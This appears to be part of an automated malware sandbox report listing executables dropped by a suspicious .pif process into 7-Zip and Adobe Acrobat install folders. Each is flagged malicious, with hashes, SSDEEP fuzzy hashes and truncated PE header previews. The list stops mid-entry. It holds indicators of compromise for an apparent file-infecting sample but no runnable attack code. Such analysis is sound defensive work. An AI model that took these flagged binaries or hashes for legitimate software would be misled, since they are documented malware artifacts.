                                                                                                                                                                                                                        SHA1:2B6D06C41D178F926A797D31A8E978CB1E51D092
                                                                                                                                                                                                                        SHA-256:7543D6D85044E2461026B9A8C43A4214352B7E0D61813B199D365A12CA1C031B
                                                                                                                                                                                                                        SHA-512:42EF2D8E268C92125669BC2DCA1356B0CCEB8BEAE33F873ED813BADD2B87E40A2A44F76D1146D415CC674EBAC68035F015D682C8C8A060315DDCDAE096EB0E01
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................P............ .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...P.......@...t..............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\7-Zip\7z.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1683968
                                                                                                                                                                                                                        Entropy (8bit):5.62311271526534
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:e+gkESfh4CofsqjnhMgeiCl7G0nehbGZpbD:TgkE+S5Dmg27RnWGj
                                                                                                                                                                                                                        MD5:00E9B63DBC557C028484E3495B99BFFC
                                                                                                                                                                                                                        SHA1:9B9AF4A277ED9AC064E5338AA687417E5F39B076
                                                                                                                                                                                                                        SHA-256:C4F036418883E88EC4AFF8B81F88DCD97EE4FD9B22A49549857C096DCAC6F377
                                                                                                                                                                                                                        SHA-512:A6186BA5E7F861055C2603218E8AD3693F7D1E3161307C17C5094BA57E65AD15D908340F877D1F5AC81A762C16C22B0BC59175FA6A5A515A0AD4D5555B9CA2D0
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............xaX.xaX.xaX...X.xaX...X.xaX.x`XlxaX...X.xaX..eY.xaX...X.xaX`.bY.xaX...X.xaX...X.xaXRich.xaX........................PE..d....\.d.........."...........................@.............................. ......C..... .....................................................x............@...q......................................................................0............................text...v........................... ..`.rdata..T...........................@..@.data....-..........................@....pdata...q...@...r..................@..@.rsrc................j..............@..@.reloc...P.......@...r..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\7-Zip\7zFM.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1532416
                                                                                                                                                                                                                        Entropy (8bit):7.096643945941094
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:/BpDRmi78gkPXlyo0Gtjr8sqjnhMgeiCl7G0nehbGZpbD:pNRmi78gkPX4o0GtjEDmg27RnWGj
                                                                                                                                                                                                                        MD5:5040C8649D02B00353D98558FA93A634
                                                                                                                                                                                                                        SHA1:38B0DDE5AAB8875EE2C4BAB4E59A44234E2239D8
                                                                                                                                                                                                                        SHA-256:D2413EE78F1C4569D97C20E06657643128441F5F7539715F845D2F07333EE269
                                                                                                                                                                                                                        SHA-512:4C42F21AFA5E534C587412EBCA2FCA19AE05CD98C565B69EAC56B22C72A303C76352AB81F60254538C04D65910AC9B39706CF61DE2A8C10D07F7A57E0A70DC10
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\..2..2..2.0.\..2..I..2..3..2..O..2..\.D.2...6..2.._..2..N..2..J..2.Rich.2.........................PE..d....\.d.........."......b...8......Pi........@.....................................w..... .................................................P................... .......................................................................(.......@....................text....a.......b.................. ..`.rdata...i.......j...f..............@..@.data...............................@....pdata.. ...........................@..@.rsrc...............................@..@.reloc...............r..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\7-Zip\7zG.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1282048
                                                                                                                                                                                                                        Entropy (8bit):7.229034650123738
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:qLOS2oTPIXVfsqjnhMgeiCl7G0nehbGZpbD:a/TsDmg27RnWGj
                                                                                                                                                                                                                        MD5:59927EE8A104658B6BA82DA41236D06C
                                                                                                                                                                                                                        SHA1:72E30FB6FA2F64445D33471DDE5ABEC85D808DE2
                                                                                                                                                                                                                        SHA-256:0B9C17928A70CA92184B9A34E867571A60EC84DAEBE71AEB5309684D87C36274
                                                                                                                                                                                                                        SHA-512:759199B433CD7096FE2808176506471FF2C56901D6E46EA5F4F26699E8D7F2E9575787D17F96FC363BAF5094010DF54E49EE60E456DF479DABD29A3643B7A894
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.VS.y8..y8..y8...C.jy8..y9..y8...E.}y8...V..y8.i.<.~y8...U.ky8...;.~y8...D.~y8...@.~y8.Rich.y8.........PE..d....\.d.........."......&..........."........@........................................... ..............................................................d...........................................................................@...............................text...4$.......&.................. ..`.rdata..Ts...@...t...*..............@..@.data...83..........................@....pdata..............................@..@.rsrc....d.......f...:..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\7-Zip\Uninstall.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1145344
                                                                                                                                                                                                                        Entropy (8bit):5.031176139948462
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:o1lXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:o1lsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:DEE1533F86738D4485164509B2E9A781
                                                                                                                                                                                                                        SHA1:FD33F6CD05550FC11141DBDAC440226088B2FFFF
                                                                                                                                                                                                                        SHA-256:DDE96339D8650AE1D586344C81EFC4AD80C2B986CC6D82AF9157DFD4CEA3BFC5
                                                                                                                                                                                                                        SHA-512:68A00C8143DC565343E7D85DB795397BD5508CCFC88A2FB1190722EC3D61560E96B01EB5C00640E11EC6970B74C1CE6E54E8A649B4F1ADEF9CFAA5D1FFC489CE
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../..........@......f!.......0....@.................................G.......................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc....`...`...P...*..............@...........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1222656
                                                                                                                                                                                                                        Entropy (8bit):6.711997539614624
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:5Rudz6Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:5Adz6sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:B818007EBD00ABCF6E67B2BD6C543B27
                                                                                                                                                                                                                        SHA1:43D864A80039A2BCEB7020709EAEDC44B6838793
                                                                                                                                                                                                                        SHA-256:2CABD5DD3E46B45D4C6D9E202A57988C7C09CEC8ED0A355DC1AB3655857E31E9
                                                                                                                                                                                                                        SHA-512:1825525C9F5CC983CD92DEAAAE60F320590226DF229FA735FEE78BCE32EA7166BAB2AE3B523792A7B5569EC175C79554D5E51E3F5B07C8E17A425E7D24EC6201
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4.F.4.F.4.F.LEF.4.FE@.G.4.FE@.G.4.FE@.G.4.FE@.G.4.F._.G.4.F.4.F%4.FG@.G.4.FG@)F.4.F.4AF.4.FG@.G.4.FRich.4.F................PE..d......d.........."......6.....................@......................................... .....................................................|....P..h........9.....................p.......................(...P...8............P...............................text....4.......6.................. ..`.rdata..>....P.......:..............@..@.data...............................@....pdata...9.......:..................@..@.rsrc...h....P......................@..@.reloc..............................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1457664
                                                                                                                                                                                                                        Entropy (8bit):5.082138606680795
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:yvOXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:HsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:BBDA931992D89B311F8F9ACAFD0DD6F0
                                                                                                                                                                                                                        SHA1:8F5E831121A359E89CF250B8C65EDC3C1F9A1071
                                                                                                                                                                                                                        SHA-256:04C16837D841D368EFFC7F007E20C5316D89F5788A33B04F5B459B3083DC6520
                                                                                                                                                                                                                        SHA-512:0B2C8F8FBCBD2F1F78F30674BB210F1717398A9750BE6D6BB8E7FF89C1DC9CB2AAFDFB4DBBEEEA6F1E2478348476CC7079A1D570AD587772E8174969C357648C
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......]../...|...|...|B..}...|B..}...|...}...|..S|...|..}=..|..}...|..}...|..}...|..=|...|o..|...|B..}...|...|...|..}...|..Q|...|..9|...|..}...|Rich...|................PE..d......d.........."......H...........&.........@....................................&..... .................................................@...,....@..........4......................T.......................(...@...8............`...............................text....G.......H.................. ..`.rdata.......`.......L..............@..@.data...............................@....pdata..4...........................@..@.CRT....@....0......................@..@.rsrc........@......................@..@.reloc...P...P...@..................@...................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1461248
                                                                                                                                                                                                                        Entropy (8bit):5.46860245442752
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:/5zhM1XSE7sqjnhMgeiCl7G0nehbGZpbD:DMsODmg27RnWGj
                                                                                                                                                                                                                        MD5:CC9B11BDA20123EA7325143C7ACC247C
                                                                                                                                                                                                                        SHA1:054B679EE1F17F78A7138DF70AA68BDC4842A542
                                                                                                                                                                                                                        SHA-256:4482E55EC1168DE21CED077B2E83243CAA59D22E41EC2C07D7A37AC5F1E23D63
                                                                                                                                                                                                                        SHA-512:8457384235D5F338155F2227A7635F37154C1C230E468FBA80087CE362E3432CDBB92B1B2DF35B9477EE2EF3F4C4FA4B38FCA4E4D03AA09B98A51BBAC1960758
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........<$.Rw.Rw.Rw...w..Rw5.Vv.Rw5.Qv.Rw5.Sv.Rw7.Sv.Rw..Vv.Rw..Tv.Rw..Sv..Rw.Sw..Rw5.Wv.Rw.t/w.Rw.t?w..Rw7.Wv.Rw7.Vv.Rw7.w.Rw..w.Rw7.Pv.RwRich.Rw........PE..d......d.........."..........z......@..........@....................................@%.... ................................................. A...................+......................T.......................(.......8............................................text............................... ..`.rdata..............................@..@.data....d...`...\...T..............@....pdata...+.......,..................@..@.rsrc............0..................@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):4151808
                                                                                                                                                                                                                        Entropy (8bit):6.4997794099032005
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:UtuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755gDmg27RN:UjEIa4HIEWOc5aD527BWG
                                                                                                                                                                                                                        MD5:08BAD6105552BA3528E01FC6745B0F3D
                                                                                                                                                                                                                        SHA1:ADE4E799A94FE73F9D2DB5F9BFA7740017728AC9
                                                                                                                                                                                                                        SHA-256:4F28B7C66AF33AAB36377E5066C51002548DABD04C3287307E22522BEE715F65
                                                                                                                                                                                                                        SHA-512:E866B274B1166FCBD4133DD23AD2E3C008A4674B37FDB6EED3E7607E10997DFDEA42B00E46E2BA9D8801F7229EAD97484E5110B77842ABA5767AF347C7E5D1E1
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @......f?... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):59941376
                                                                                                                                                                                                                        Entropy (8bit):7.999367299934912
                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                        SSDEEP:1572864:iQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:ZXhwMhe6AABPiQwF6xQ22R
                                                                                                                                                                                                                        MD5:5CEFAD8FC42CDAA882E1914878B301AE
                                                                                                                                                                                                                        SHA1:328FA2D8D4F65156CF4AAAA79611A23391F5BE8A
                                                                                                                                                                                                                        SHA-256:9892755DB9495FF8C5EBC4657E085C438F30FEA3FEBBDFC221F80617300BDEAA
                                                                                                                                                                                                                        SHA-512:D2B9DD0D1E4314DB07750C97661B9AC82504B67BA569712CE1D74F66A2612363E9F67C0E3DEC1722258F1BE2D54C0D0787FD9E5F9A7129B0AC4678C89DFFD17F
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0........... .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1180160
                                                                                                                                                                                                                        Entropy (8bit):5.084799543039932
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:eWeXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:eLsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:1DC43EC9B6847AB0D2629B607DDF560B
                                                                                                                                                                                                                        SHA1:D63CDFF7E993317DBF8596E418E9A05DF9AC4196
                                                                                                                                                                                                                        SHA-256:F460B3FFCCC4B8816E6F33DA5100D2D26DC4B26607581980D25ED8C797A7D52B
                                                                                                                                                                                                                        SHA-512:A528B66D80B8CB35F819AC7F8A15B71E15F35B773AA91FFF5E6D52493EBA6C73F2CAEA2526A94ADD3E7B1A17BCAE84CD8C1E9D27D46228183A94B48DA2930784
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e....b..b..b.|...b.epf..b.epa..b.epg..b.epc..b.oc..b..c.2.b.gpg..b.gp...b.....b.gp`..b.Rich..b.................PE..d...R..d.........."......l...Z.......m.........@.............................@......'3.... .....................................................|.......p.......@.......................T.......................(.......8............................................text...>k.......l.................. ..`.rdata..J:.......<...p..............@..@.data...............................@....pdata..@...........................@..@.rsrc...p...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):6210048
                                                                                                                                                                                                                        Entropy (8bit):6.386701565493479
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:yDvZEaFVUn+Dpasot2xQevgjCGT7lmPIionqOgBhGl6zVLkVEk3yV07U24GEQTXG:DnN9KfxLk6GEQTX5UKzNDhD527BWG
                                                                                                                                                                                                                        MD5:73A9EB886A04C0803792CBB7FB5F8581
                                                                                                                                                                                                                        SHA1:C6E534E59B5B74DC2FBCE55DFCB5FE9AD7AE8B82
                                                                                                                                                                                                                        SHA-256:99B46636D18BDC2E4F58922D7C90D1D5E89DAAE36D05E09A9ABE57B3510D6344
                                                                                                                                                                                                                        SHA-512:25F083AD7752348D029C6DB57F2599BB121C71AB758BFBEEFB5216D1721EE21BB22D4388D92E0C9E70EF3790733CFB45A3D9A50E187D43CBB4E1714C6F1100D4
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......;..j...9...9...9k..8r..9k..8...9...8l..9...8t..9..p9|..9...9...9...8...9k..8\..9k..8}..9k..8n..9...9...9...8Y..9...8~..9..r9~..9...9|..9...8~..9Rich...9........................PE..d......d.........."......V4..,"......L(........@.............................._.....C.^... ..........................................<F.|....EF.x....0K..V...@H......................n;.T....................o;.(....:.8............p4..... .F.`....................text...,T4......V4................. ..`.rdata..@....p4......Z4.............@..@.data...l.....F......nF.............@....pdata.......@H......vG.............@..@.didat.. .....K......>J.............@..._RDATA....... K......HJ.............@..@.rsrc....V...0K..X...JJ.............@..@.reloc...0....V.. ....U.............@...................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1157120
                                                                                                                                                                                                                        Entropy (8bit):5.041478663897403
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:UDXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:UDsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:389823CBA4DF7A0F4C117B9B84C566AA
                                                                                                                                                                                                                        SHA1:D897C1E99C3160281C7849A8A86C0E8E3156B751
                                                                                                                                                                                                                        SHA-256:41EF43F472349026CE6AF7FD5CBC414F4071FF296D829AB1780F47D40793F411
                                                                                                                                                                                                                        SHA-512:C247B199923A1F9D1E91F6D3694CD7E637263BB5C6BB0068E045D3AB6C6035CDE6FDE5CD1DE529DC0E5186B505EF1AD16E8ED54386D67776AC624C81359912F8
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.tKx...x...x...q..t.......c.......r.......{.......~...l...}...x...........|.......y...x...y.......y...Richx...................PE..d......d.........."..........>.......0.........@....................................;C.... .................................................lV..........h...........................PI..T....................K..(....I..8............@...............................text....,.......................... ..`.rdata..4"...@...$...2..............@..@.data........p.......V..............@....pdata...............X..............@..@.rsrc...h............\..............@..@.reloc...P.......@...h..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):12039168
                                                                                                                                                                                                                        Entropy (8bit):6.596675052286067
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:98304:Tb+MzPstUEHInwZk3RBk9DdhgJCudq1uVIyESYgKwD527BWG:fnPgTHIwZoRBk9DdhSUEVIXgKwVQBWG
                                                                                                                                                                                                                        MD5:6557F2907007AD01DBE9027F4F3C1140
                                                                                                                                                                                                                        SHA1:41FA45DDAE9FD0838A1B4857C8C43A2A0C6928C7
                                                                                                                                                                                                                        SHA-256:78560DF7C0B5152C07A5E5F00700447F05C60A5E344CCC3E29652C314CE314A2
                                                                                                                                                                                                                        SHA-512:069630D182F4AF15D210B257BF0FE749FBF16DDEAF33ACE4953D862DC275A86739650061901314C1E60E7FAF8F92F99DBC45E9A6F79D670F43F29AF2E93E217E
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......&.w.bb..bb..bb..v...lb..v...b.....qb.....hb......ab......b..E.t.Vb..E.d.jb.....ib......b..v...|b..v...cb.....`..bb..}b..v...Ab..bb..,`.....b.....cb.....cb..bb..`b.....cb..Richbb..........PE..d......d..........".........../.....0.F........@.......................................... ............................................\...,..h........G......Lz..................P..T......................(......8...........................................text............................... ..`.rdata..f. .......!.................@..@.data..............................@....pdata..Lz.......|.................@..@.didat...............X..............@..._RDATA...............Z..............@..@.rsrc....G.......H...\..............@..@.reloc... .........................@...........................................................................................

                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1322496
                                                                                                                                                                                                                        Entropy (8bit):5.281796657227052
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:lg5FvCPusEsqjnhMgeiCl7G0nehbGZpbD:CftzDmg27RnWGj
                                                                                                                                                                                                                        MD5:A1DC1BB0EBD64CD0EEF24B55681564E4
                                                                                                                                                                                                                        SHA1:3EBE4A4329ACEAE9BD64AD89EABF81ECEFC33651
                                                                                                                                                                                                                        SHA-256:D540FF8D6D3D7E728866332EE41DABC2C76076CDB7D2D433AC51CC3BE202DAB4
                                                                                                                                                                                                                        SHA-512:22C36A51FCD0A671B58B07BB61E3125562738C838FC7835B979680844DF7C51EEE40199AEAF5D6D51066DB57643D46DA4C6AF31AA166AA5CBD972E04C58C1CC0
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ z.A...A...A...9...A..O5...A..O5...A..O5...A..O5...A...*...A...A...@..M5...A..M5.A...A...A..M5...A..Rich.A..................PE..d......d.........."..........b.................@.............................p......+E.... .................................................X...h....p..p....P..t.......................T.......................(.......8............................................text...,........................... ..`.rdata.............................@..@.data........@.......&..............@....pdata..t....P......................@..@.rsrc...p....p.......B..............@..@.reloc...P... ...@..................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1339904
                                                                                                                                                                                                                        Entropy (8bit):7.208878269650056
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:UjKTIsAjFuvtIfmFthMaT5U8aChaeuCsqjnhMgeiCl7G0nehbGZpbD:UjIMmPh7TT79LDmg27RnWGj
                                                                                                                                                                                                                        MD5:64E3E3C8B574FFA2EDFC513EECC4505B
                                                                                                                                                                                                                        SHA1:C1B6550D0E19E4055355DF944EE6E1F9D24F5E5C
                                                                                                                                                                                                                        SHA-256:EBF2168798E4C9DFC84EE66FD3A55D2163A04AA7C0FF90DB85239CFFE14D5E2C
                                                                                                                                                                                                                        SHA-512:91C263846B3814B23BD8D2DE1902E13468019747ADC803BFDA58DEF68631676F129B41755B4A04DF2CF15A48E2D96CAC5A705331C083B10A5ECDF76B3F60A7DB
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$......................................s...X............................[....U=....................h...n......n.Y.....1....n......Rich...........PE..d......c..........".................0i.........@..............................$.....=w.... .................................................H...d............@..Tx......................p...................`...(...`................................................text............................... ..`.rdata..@...........................@..@.data....>......."..................@....pdata..Tx...@...z..................@..@.rsrc................z..............@..@.reloc..............................@...................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1515520
                                                                                                                                                                                                                        Entropy (8bit):5.411765736209586
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:9GqVwCto1Gm5WgusqjnhMgeiCl7G0nehbGZpbD:MZ1GmUxDmg27RnWGj
                                                                                                                                                                                                                        MD5:FABCEFE2A13ADDD6F1A508A3BE58B4F5
                                                                                                                                                                                                                        SHA1:5731288C7D5785ADE22BB7B7639366DCC28EC17A
                                                                                                                                                                                                                        SHA-256:B54402B4F1FF4B13CCF48D4E9844805C8DCA6EC8527DFD9672762D8580DFE2BB
